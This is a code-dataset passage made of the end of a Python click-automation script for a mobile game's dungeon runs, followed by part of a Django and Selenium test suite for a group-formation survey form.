self.device.click(0.774, 0.585)
time.sleep(5)
self.device.click(0.718, 0.223)
time.sleep(5)
self.device.click(0.712, 0.219)
time.sleep(5)
self.device.click(0.6, 0.248)
time.sleep(5)
self.device.click(0.606, 0.436)
time.sleep(5)
self.device.click(0.708, 0.439)
time.sleep(5)
self.device.click(0.368, 0.237)
time.sleep(5)
self.device.click(0.264, 0.241)
time.sleep(5)
self.device.click(0.152, 0.138)
time.sleep(5)
self.device.click(0.484, 0.234)
time.sleep(5)
self.device.click(0.608, 0.358)
time.sleep(5)
self.device.click(0.44, 0.475)
time.sleep(5)
self.device.click(0.496, 0.542)
time.sleep(5)
self.device.click(0.486, 0.443)
time.sleep(5)
self.device.click(0.384, 0.535)
time.sleep(5)
self.device.click(0.438, 0.471)
time.sleep(5)
self.device.click(0.328, 0.39)
time.sleep(5)
self.device.click(0.602, 0.446)
time.sleep(12)
# --------------------------------------
print("""第三次与士兵对话""")
self.device.click(0.544, 0.588) # 走过去
time.sleep(5)
self.device.click(0.918, 0.542)
time.sleep(5)
self.device.click(0.61, 0.432)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(12)
print("""进入副本打怪""")
self.device.click(0.66, 0.804)
time.sleep(5)
self.device.click(0.774, 0.585)
time.sleep(5)
self.device.click(0.718, 0.223)
time.sleep(5)
self.device.click(0.712, 0.219)
time.sleep(5)
self.device.click(0.6, 0.248)
time.sleep(5)
self.device.click(0.606, 0.436)
time.sleep(5)
self.device.click(0.708, 0.439)
time.sleep(5)
self.device.click(0.368, 0.237)
time.sleep(5)
self.device.click(0.264, 0.241)
time.sleep(5)
self.device.click(0.152, 0.138)
time.sleep(5)
self.device.click(0.484, 0.234)
time.sleep(5)
self.device.click(0.608, 0.358)
time.sleep(5)
self.device.click(0.44, 0.475)
time.sleep(5)
self.device.click(0.496, 0.542)
time.sleep(5)
self.device.click(0.486, 0.443)
time.sleep(5)
self.device.click(0.384, 0.535)
time.sleep(5)
self.device.click(0.438, 0.471)
time.sleep(5)
self.device.click(0.328, 0.39)
time.sleep(5)
self.device.click(0.602, 0.446)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.592, 0.613)
time.sleep(2)
self.device.click(0.456, 0.861)
time.sleep(6)
print('----------------------燕王阁完成-------------------')
def ku_gu(self):
print("""从泰山到杭州""")
self.device.click(0.208, 0.943)
time.sleep(2)
self.device.click(0.302, 0.804)
time.sleep(2)
self.device.click(0.616, 0.698)
time.sleep(2)
self.device.click(0.478, 0.936)
time.sleep(8)
print("""走到副本""")
self.device.click(0.044, 0.734)
time.sleep(5)
self.device.click(0.216, 0.294)
time.sleep(5)
self.device.click(0.26, 0.326)
time.sleep(5)
self.device.click(0.444, 0.18)
time.sleep(5)
self.device.click(0.928, 0.546)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(5)
self.device.click(0.602, 0.432)
time.sleep(12)
print("""进入副本开刷""")
self.device.click(0.808, 0.581)
time.sleep(5)
self.device.click(0.548, 0.18)
time.sleep(5)
self.device.click(0.214, 0.088)
time.sleep(5)
self.device.click(0.772, 0.776)
time.sleep(5)
self.device.click(0.665, 0.588)
time.sleep(5)
self.device.click(0.688, 0.287)
time.sleep(5)
self.device.click(0.712, 0.514)
time.sleep(5)
self.device.click(0.49, 0.262)
time.sleep(5)
self.device.click(0.748, 0.216)
time.sleep(5)
self.device.click(0.654, 0.588)
time.sleep(5)
self.device.click(0.596, 0.138)
time.sleep(5)
self.device.click(0.768, 0.287)
time.sleep(5)
self.device.click(0.494, 0.407)
time.sleep(8)
self.device.click(0.662, 0.258)
time.sleep(5)
self.device.click(0.152, 0.549)
time.sleep(5)
self.device.click(0.608, 0.432)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.594, 0.294)
time.sleep(2)
self.device.click(0.456, 0.549)
time.sleep(6)
print('----------------------枯骨门完成-------------------')
def tian_yi(self):
print("""从泰山到成都""")
self.device.click(0.21, 0.96)
time.sleep(2)
self.device.click(0.296, 0.815)
time.sleep(2)
self.device.click(0.154, 0.907)
time.sleep(2)
self.device.click(0.016, 0.939)
time.sleep(8)
print("""走到副本""")
self.device.click(0.436, 0.797)
time.sleep(5)
self.device.click(0.598, 0.734)
time.sleep(5)
self.device.click(0.92, 0.535)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(5)
self.device.click(0.612, 0.436)
time.sleep(8)
print("""进入副本刷怪""")
self.device.click(0.754, 0.79)
time.sleep(5)
self.device.click(0.662, 0.585)
time.sleep(5)
self.device.click(0.758, 0.776)
time.sleep(5)
self.device.click(0.716, 0.539)
time.sleep(5)
self.device.click(0.432, 0.287)
time.sleep(5)
self.device.click(0.588, 0.23)
time.sleep(5)
self.device.click(0.268, 0.241)
time.sleep(5)
self.device.click(0.208, 0.109)
time.sleep(5)
self.device.click(0.766, 0.202)
time.sleep(5)
self.device.click(0.438, 0.599)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.938, 0.251)
time.sleep(2)
self.device.click(0.794, 0.521)
time.sleep(6)
print('----------------------天一教完成-------------------')
def tie_ren(self):
print("""泰山到杭州""")
self.device.click(0.202, 0.946)
time.sleep(2)
self.device.click(0.304, 0.819)
time.sleep(2)
self.device.click(0.614, 0.698)
time.sleep(2)
self.device.click(0.476, 0.946)
time.sleep(8)
print("""走到副本""")
self.device.click(0.048, 0.726)
time.sleep(5)
self.device.click(0.214, 0.294)
time.sleep(5)
self.device.click(0.248, 0.322)
time.sleep(5)
self.device.click(0.206, 0.294)
time.sleep(5)
self.device.click(0.104, 0.581)
time.sleep(5)
self.device.click(0.146, 0.762)
time.sleep(5)
self.device.click(0.264, 0.343)
time.sleep(5)
self.device.click(0.606, 0.439)
time.sleep(5)
self.device.click(0.606, 0.439)
time.sleep(12)
print("""进入副本开刷""")
self.device.click(0.208, 0.258)
time.sleep(5)
self.device.click(0.712, 0.248)
time.sleep(5)
self.device.click(0.72, 0.237)
time.sleep(5)
self.device.click(0.66, 0.294)
time.sleep(5)
self.device.click(0.378, 0.237)
time.sleep(5)
self.device.click(0.656, 0.496)
time.sleep(5)
self.device.click(0.656, 0.393)
time.sleep(5)
self.device.click(0.434, 0.691)
time.sleep(5)
self.device.click(0.604, 0.429)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.594, 0.294)
time.sleep(2)
self.device.click(0.456, 0.549)
time.sleep(6)
print("-----------------铁刃门完成--------------------")
def yi_jian(self):
print("-----------一键任务开始运行--------------")
self.sai_bei()
self.yan_wang()
self.ku_gu()
self.tian_yi()
self.tie_ren()
print("-----------一键任务运行结束--------------")
@staticmethod
def thread_it(func, *args):
"""多线程防止阻塞"""
t = threading.Thread(target=func, args=args)
t.setDaemon(True) # 守护
t.start() # 启动
if __name__ == '__main__':
app = MainWindow()
app.mainloop() | 30.883268 | 95 | 0.500063 | 2,290 | 15,874 | 3.448035 | 0.132314 | 0.25076 | 0.37424 | 0.399189 | 0.805218 | 0.805218 | 0.754686 | 0.653875 | 0.653875 | 0.424265 | 0 | 0.17015 | 0.321721 | 15,874 | 514 | 96 | 30.883268 | 0.563202 | 0.010268 | 0 | 0.64 | 0 | 0 | 0.038167 | 0.022676 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018947 | false | 0 | 0.008421 | 0 | 0.029474 | 0.077895 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
150506f8fc87c78275ef2cd39145c68845db6d22 | 32,551 | py | Python | response_screen/tests.py | snowminc/Groupformer | 5712ab3b2c21ebea9d96adab6265acba4000fb9e | [
"MIT"
] | 1 | 2021-02-19T18:43:35.000Z | 2021-02-19T18:43:35.000Z | response_screen/tests.py | snowminc/Groupformer | 5712ab3b2c21ebea9d96adab6265acba4000fb9e | [
"MIT"
] | 72 | 2021-02-16T23:37:09.000Z | 2021-05-10T21:58:31.000Z | response_screen/tests.py | snowminc/Groupformer | 5712ab3b2c21ebea9d96adab6265acba4000fb9e | [
"MIT"
] | 2 | 2021-09-05T03:00:05.000Z | 2021-09-13T14:38:26.000Z | from django.test import TestCase
from django.urls import reverse
from django.contrib.auth.models import User
from django.contrib.staticfiles.testing import LiveServerTestCase
from time import sleep
from selenium.webdriver.firefox.webdriver import WebDriver
from dbtools.models import *
def create_sample_groupformer():
User.objects.create_user("mchon", "minc1@umbc.edu", "pahKygvg")
User.objects.create_user("bjohn", "ben.johnson@umbc.edu", "MnbHtgUr")
gfs = {}
gfs[1] = {}
gfs[1]['gf'] = addGroupFormer("Min Chon", "minc1@umbc.edu", "34")
gfs[2] = {}
gfs[2]['gf'] = addGroupFormer("Ben Johnson", "ben.johnson@umbc.edu", "24")
return gfs
def create_sample_projects(gfs):
gfs[1]['p1'] = Project.objects.create(group_former=gfs[1]['gf'], project_name="Groupformer Tool", project_description="Create a tool that creates groups!")
gfs[1]['p2'] = Project.objects.create(group_former=gfs[1]['gf'], project_name="Robot that pees beer", project_description="Create a modification on a very expensive robot dog!")
gfs[2]['p1'] = Project.objects.create(group_former=gfs[2]['gf'], project_name="Literally Something", project_description="Literally Anything!")
gfs[2]['p2'] = Project.objects.create(group_former=gfs[2]['gf'], project_name="What", project_description="I dont know.")
def create_sample_attributes(gfs):
# Intentionally do not create attributes for second groupformer
gfs[1]['a1'] = Attribute.objects.create(group_former=gfs[1]['gf'], attr_name="Back-End", is_homogenous=False, is_continuous=True)
gfs[1]['a2'] = Attribute.objects.create(group_former=gfs[1]['gf'], attr_name="Front-End", is_homogenous=True, is_continuous=True)
gfs[1]['a3'] = Attribute.objects.create(group_former=gfs[1]['gf'], attr_name="Dog Lover", is_homogenous=False, is_continuous=False)
def create_sample_participants(gfs):
names = ["Min","Kristian","Sarah","Morgan","Kyle","Ben","Eric","Andrew"]
for i in range(len(names)):
gfs[1]['part'+str(i+1)] = Participant.objects.create(group_former=gfs[1]['gf'], part_name=names[i], part_email=f"{names[i]}@email.com")
gfs[2]['part'+str(i+1)] = Participant.objects.create(group_former=gfs[2]['gf'], part_name=names[i], part_email=f"{names[i]}@email.com")
return names
def create_all_samples():
gfs = create_sample_groupformer()
create_sample_projects(gfs)
create_sample_attributes(gfs)
create_sample_participants(gfs)
return gfs
class MinIteration3ResponseScreenTests(TestCase):
def login_to_sample_groupformer(self):
self.client.post(reverse('response_screen:login', kwargs={"groupformer_id": 1}), {"email": "Kristian@email.com"})
def test_displays_all_projects(self):
"""
Check if the projects created appear on the form
"""
create_all_samples()
self.login_to_sample_groupformer()
response = self.client.get(reverse('response_screen:response_screen', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Groupformer Tool")
self.assertContains(response, "Robot that pees beer")
self.assertContains(response, "Create a tool that creates groups!")
self.assertContains(response, "Create a modification on a very expensive robot dog!")
response = self.client.get(reverse('response_screen:response_screen', args=(2,)))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Literally Something")
self.assertContains(response, "What")
self.assertContains(response, "Literally Anything!")
self.assertContains(response, "I dont know.")
def test_displays_projects_without_attributes(self):
"""
Check if the form still displays projects even if no attributes were created
"""
gfs = create_sample_groupformer()
create_sample_projects(gfs)
create_sample_participants(gfs)
self.login_to_sample_groupformer()
response = self.client.get(reverse('response_screen:response_screen', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Groupformer Tool")
self.assertContains(response, "Robot that pees beer")
self.assertContains(response, "Create a tool that creates groups!")
self.assertContains(response, "Create a modification on a very expensive robot dog!")
response = self.client.get(reverse('response_screen:response_screen', args=(2,)))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Literally Something")
self.assertContains(response, "What")
self.assertContains(response, "Literally Anything!")
self.assertContains(response, "I dont know.")
def test_displays_all_attributes(self):
"""
Check if all attributes appear on the form
"""
create_all_samples()
self.login_to_sample_groupformer()
response = self.client.get(reverse('response_screen:response_screen', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Back-End")
self.assertContains(response, "Front-End")
self.assertContains(response, "Dog Lover")
# The second GroupFormer intentionally does not have any attributes
response = self.client.get(reverse('response_screen:response_screen', args=(2,)))
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "Back-End")
self.assertNotContains(response, "Front-End")
self.assertNotContains(response, "Dog Lover")
def test_displays_attributes_without_projects(self):
"""
Check if the form still displays attributes even if no projects were created
"""
gfs = create_sample_groupformer()
create_sample_attributes(gfs)
create_sample_participants(gfs)
self.login_to_sample_groupformer()
response = self.client.get(reverse('response_screen:response_screen', args=(1,)))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Back-End")
self.assertContains(response, "Front-End")
self.assertContains(response, "Dog Lover")
# The second GroupFormer intentionally does not have any attributes
response = self.client.get(reverse('response_screen:response_screen', args=(2,)))
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, "Back-End")
self.assertNotContains(response, "Front-End")
self.assertNotContains(response, "Dog Lover")
def test_displays_without_projects_or_attributes(self):
"""
Check if the form still displays despite no projects and attributes created
"""
gfs = create_sample_groupformer()
create_sample_participants(gfs)
self.login_to_sample_groupformer()
response = self.client.get(reverse('response_screen:response_screen', args=(1,)))
self.assertEqual(response.status_code, 200)
def test_displays_participants(self):
"""
Test that the form lists EVERY participant in the preference selection box
"""
gfs = create_sample_groupformer()
names = create_sample_participants(gfs)
self.login_to_sample_groupformer()
response1 = self.client.get(reverse('response_screen:response_screen', args=(1,)))
response2 = self.client.get(reverse('response_screen:response_screen', args=(2,)))
for i in range(len(names)):
self.assertContains(response1, names[i])
self.assertContains(response2, names[i])
class SeleniumResponseScreen(LiveServerTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.selenium = WebDriver()
cls.selenium.implicitly_wait(1)
@classmethod
def tearDownClass(cls):
cls.selenium.quit()
super().tearDownClass()
def login_to_sample_groupformer(self, groupformer_id):
self.selenium.get(self.live_server_url + reverse('response_screen:login', kwargs={'groupformer_id': groupformer_id}))
self.selenium.find_element_by_id('email').send_keys("Kristian@email.com")
self.selenium.find_element_by_id('login-submit').click()
# Should be redirected to response screen
self.assertTrue(self.selenium.current_url.endswith(f"/response_screen/{groupformer_id}"))
def test_missing_projects_preference(self):
"""
Test if the error message shows if user does not input a preference for a project.
"""
gfs = create_all_samples()
# ID is necessary because each Selenium test does not create its own isolated DB for models
gfs1 = gfs[1]['gf'].id
self.login_to_sample_groupformer(gfs1)
# Test for the first groupformer object
self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))
# Select preferences for both projects
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Very Interested']".format(gfs[1]['p1'].pk)).click()
# Remove the second project to test missing error
#self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='PLEASE NO']".format(gfs[1]['p2'].pk)).click()
# Select preferences for all attributes
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()
# Select a few students
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()
# Submit
self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()
error_message = self.selenium.find_element_by_xpath("//div[@id='projForm{}_error']".format(gfs[1]['p2'].pk))
# Using .text instead of .get_attribute("innerHTML") because innerHTML still contains the error, but is hidden
# on display. .text only shows what the user sees (ignores any `display: hidden` text)
self.assertTrue("Must select a preference for this project." in error_message.text)
def test_missing_attributes_preference(self):
"""
Test if the error message shows if user does not input a preference for an attribute.
"""
gfs = create_all_samples()
# ID is necessary because each Selenium test does not create its own isolated DB for models
gfs1 = gfs[1]['gf'].id
self.login_to_sample_groupformer(gfs1)
# Test for the first groupformer object
self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))
# Select preferences for both projects
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Very Interested']".format(gfs[1]['p1'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='PLEASE NO']".format(gfs[1]['p2'].pk)).click()
# Select preferences for all attributes
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
# Remove the third attribute to test missing error
#self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()
# Select a few students
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()
# Submit
self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()
error_message = self.selenium.find_element_by_xpath("//div[@id='attrForm{}_error']".format(gfs[1]['a3'].pk))
# Using .text instead of .get_attribute("innerHTML") because innerHTML still contains the error, but is hidden
# on display. .text only shows what the user sees (ignores any `display: hidden` text)
self.assertTrue("Must select a preference for this attribute." in error_message.text)
def test_missing_user_info(self):
"""
Test if the error message shows if user does not input a preference for an attribute.
"""
gfs = create_all_samples()
# ID is necessary because each Selenium test does not create its own isolated DB for models
gfs1 = gfs[1]['gf'].id
self.login_to_sample_groupformer(gfs1)
# Test for the first groupformer object
self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))
# Remove user info to test missing error
#self.selenium.find_element_by_xpath("//select[@id='projForm1']/option[text()='Very Interested']").click()
#self.selenium.find_element_by_xpath("//select[@id='projForm2']/option[text()='PLEASE NO']").click()
# Select preferences for all attributes
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()
# Select a few students
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()
# Submit
self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()
proj1_error_message = self.selenium.find_element_by_id(f"projForm{gfs[1]['p1'].pk}_error")
proj2_error_message = self.selenium.find_element_by_id(f"projForm{gfs[1]['p2'].pk}_error")
# Using .text instead of .get_attribute("innerHTML") because innerHTML still contains the error, but is hidden
# on display. .text only shows what the user sees (ignores any `display: hidden` text)
self.assertTrue("Must select a preference for this project." in proj1_error_message.text)
self.assertTrue("Must select a preference for this project." in proj2_error_message.text)
def test_missing_participant(self):
"""
Test if the form still successfuly submits on missing participants (it is not a required input)
"""
gfs = create_all_samples()
# ID is necessary because each Selenium test does not create its own isolated DB for models
gfs1 = gfs[1]['gf'].id
self.login_to_sample_groupformer(gfs1)
# Test for the first groupformer object
self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))
# Select preferences for both projects
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Very Interested']".format(gfs[1]['p1'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='PLEASE NO']".format(gfs[1]['p2'].pk)).click()
# Select preferences for all attributes
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()
# Select no students
#self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
#self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
#self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()
# Submit
self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()
# # Currently, the form is set to post parameters in the URL.
# url = self.selenium.current_url
# # Isolate the parameters of the POSTed form
# param_url = url.rsplit('?', 1)[1]
# params = param_url.split("&")
# for i in range(len(params)):
# # Replace symbol placeholders with correct character
# params[i] = params[i].replace("%20", " ")
# params[i] = params[i].replace("+", " ")
# params[i] = params[i].replace("%40", "@")
# # Create name, value pairs
# params[i] = tuple(params[i].split("="))
#
# # For each attribute form, the homogenous/continuous values are a hidden form retrieved from the model.
# # Check if those attributes carried over the correct values for those model objects.
# self.assertEqual(len(params), 6) # Check that only the following 5 tuples exist (plus CSRF token)
# self.assertTrue(('projForm{}_preference'.format(gfs[1]['p1'].pk), '5') in params)
# self.assertTrue(('projForm{}_preference'.format(gfs[1]['p2'].pk), '1') in params)
# self.assertTrue(('attrForm{}_preference'.format(gfs[1]['a1'].pk), '4') in params)
# self.assertTrue(('attrForm{}_preference'.format(gfs[1]['a2'].pk), '2') in params)
# self.assertTrue(('attrForm{}_preference'.format(gfs[1]['a3'].pk), '5') in params)
self.assertEqual(len(project_selection.objects.all()), 2)
self.assertEqual(len(attribute_selection.objects.all()), 3)
self.assertEqual(gfs[1]['part2'].getProjectChoice(gfs[1]['p1']).value, 5)
self.assertEqual(gfs[1]['part2'].getProjectChoice(gfs[1]['p2']).value, 1)
self.assertEqual(gfs[1]['part2'].getAttributeChoice(gfs[1]['a1']).value, 4)
self.assertEqual(gfs[1]['part2'].getAttributeChoice(gfs[1]['a2']).value, 2)
self.assertEqual(gfs[1]['part2'].getAttributeChoice(gfs[1]['a3']).value, 5)
def test_fill_response_screen(self):
"""
Test that users are required to input important fields such as Name, Email, and all preference boxes
"""
gfs = create_all_samples()
# ID is necessary because each Selenium test does not create its own isolated DB for models
gfs1 = gfs[1]['gf'].id
gfs2 = gfs[2]['gf'].id
self.login_to_sample_groupformer(gfs1)
#########################################
# Test for the first groupformer object #
#########################################
self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))
# Select preferences for both projects
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Very Interested']".format(gfs[1]['p1'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='PLEASE NO']".format(gfs[1]['p2'].pk)).click()
# Select preferences for all attributes
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()
# Select a few students
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()
# Submit
self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()
# Currently, the form is set to post parameters in the URL.
self.assertEqual(len(project_selection.objects.all()), 2)
self.assertEqual(len(attribute_selection.objects.all()), 3)
self.assertEqual(gfs[1]['part2'].getProjectChoice(gfs[1]['p1']).value, 5)
self.assertEqual(gfs[1]['part2'].getProjectChoice(gfs[1]['p2']).value, 1)
self.assertEqual(gfs[1]['part2'].getAttributeChoice(gfs[1]['a1']).value, 4)
self.assertEqual(gfs[1]['part2'].getAttributeChoice(gfs[1]['a2']).value, 2)
self.assertEqual(gfs[1]['part2'].getAttributeChoice(gfs[1]['a3']).value, 5)
self.assertSetEqual({'Min', 'Kristian', 'Ben'}, {x.part_name for x in gfs[1]['part2'].desired_partner.all()})
##########################################
# Test for the second groupformer object #
##########################################
self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs2}))
# Select preferences for both projects
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Neutral']".format(gfs[2]['p1'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Somewhat Interested']".format(gfs[2]['p2'].pk)).click()
# Select preferences for all attributes (None :D)
# Select a few students
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Sarah']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kyle']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Morgan']").click()
# Submit
self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()
# # Currently, the form is set to post parameters in the URL.
# url = self.selenium.current_url
# # Isolate the parameters of the POSTed form
# param_url = url.rsplit('?', 1)[1]
# params = param_url.split("&")
# for i in range(len(params)):
# # Replace symbol placeholders with correct character
# params[i] = params[i].replace("%20", " ")
# params[i] = params[i].replace("+", " ")
# params[i] = params[i].replace("%40", "@")
# # Create name, value pairs
# params[i] = tuple(params[i].split("="))
#
# # Attributes do not exist on this Groupformer instance, do not check for them
# self.assertEqual(len(params), 6) # Check that only the following 5 tuples exist (plus CSRF token)
# self.assertTrue(('projForm{}_preference'.format(gfs[2]['p1'].pk), '3') in params)
# self.assertTrue(('projForm{}_preference'.format(gfs[2]['p2'].pk), '4') in params)
# self.assertTrue(('participantForm_preference', 'Sarah') in params)
# self.assertTrue(('participantForm_preference', 'Kyle') in params)
# self.assertTrue(('participantForm_preference', 'Morgan') in params)
self.assertEqual(len(project_selection.objects.all()), 4)
self.assertEqual(len(attribute_selection.objects.all()), 3)
self.assertEqual(gfs[2]['part2'].getProjectChoice(gfs[2]['p1']).value, 3)
self.assertEqual(gfs[2]['part2'].getProjectChoice(gfs[2]['p2']).value, 4)
self.assertSetEqual({'Sarah', 'Kyle', 'Morgan'}, {x.part_name for x in gfs[2]['part2'].desired_partner.all()})
def test_modal_shows_success(self):
"""
Test that the modal shows on successful submission
"""
gfs = create_all_samples()
# ID is necessary because each Selenium test does not create its own isolated DB for models
gfs1 = gfs[1]['gf'].id
self.login_to_sample_groupformer(gfs1)
#########################################
# Test for the first groupformer object #
#########################################
self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))
# Select preferences for both projects
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Very Interested']".format(gfs[1]['p1'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='PLEASE NO']".format(gfs[1]['p2'].pk)).click()
# Select preferences for all attributes
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()
# Select a few students
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()
# Submit
self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()
sleep(1)
# Check the Modal
# .text only grabs VISIBLE text
modal_content = self.selenium.find_element_by_xpath("//div[@id='submitSuccessModalContent']").text
# Project preferences
self.assertTrue(gfs[1]['p1'].project_name in modal_content)
self.assertTrue("5" in modal_content)
self.assertTrue(gfs[1]['p2'].project_name in modal_content)
self.assertTrue("1" in modal_content)
# Attribute preferences
self.assertTrue(gfs[1]['a1'].attr_name in modal_content)
self.assertTrue("4" in modal_content)
self.assertTrue(gfs[1]['a2'].attr_name in modal_content)
self.assertTrue("2" in modal_content)
self.assertTrue(gfs[1]['a3'].attr_name in modal_content)
self.assertTrue("5" in modal_content)
# Participants listed
self.assertTrue("Kristian" in modal_content)
self.assertTrue("Min" in modal_content)
self.assertTrue("Ben" in modal_content)
def test_modal_shows_failure(self):
"""
Test that the modal does not show if the submission was a failure
"""
gfs = create_all_samples()
# ID is necessary because each Selenium test does not create its own isolated DB for models
gfs1 = gfs[1]['gf'].id
self.login_to_sample_groupformer(gfs1)
#########################################
# Test for the first groupformer object #
#########################################
